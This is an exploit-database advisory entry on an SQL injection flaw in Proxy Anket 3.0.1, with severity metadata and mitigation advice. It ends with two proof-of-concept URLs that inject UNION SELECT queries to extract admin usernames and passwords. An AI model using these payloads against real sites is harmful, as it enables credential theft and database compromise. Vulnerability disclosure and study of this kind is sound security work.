header-logo
Suggest Exploit
vendor:
Proxy Anket
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Proxy Anket
Affected Version From: 3.0.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:proxy_anket:proxy_anket:3.0.1
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

SQL Injection in Proxy Anket

Proxy Anket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Regularly updating Proxy Anket to the latest version and applying any available patches is also advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25613/info

Proxy Anket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects Proxy Anket 3.0.1; other versions may also be vulnerable.

http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,username,3+from+admin
http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin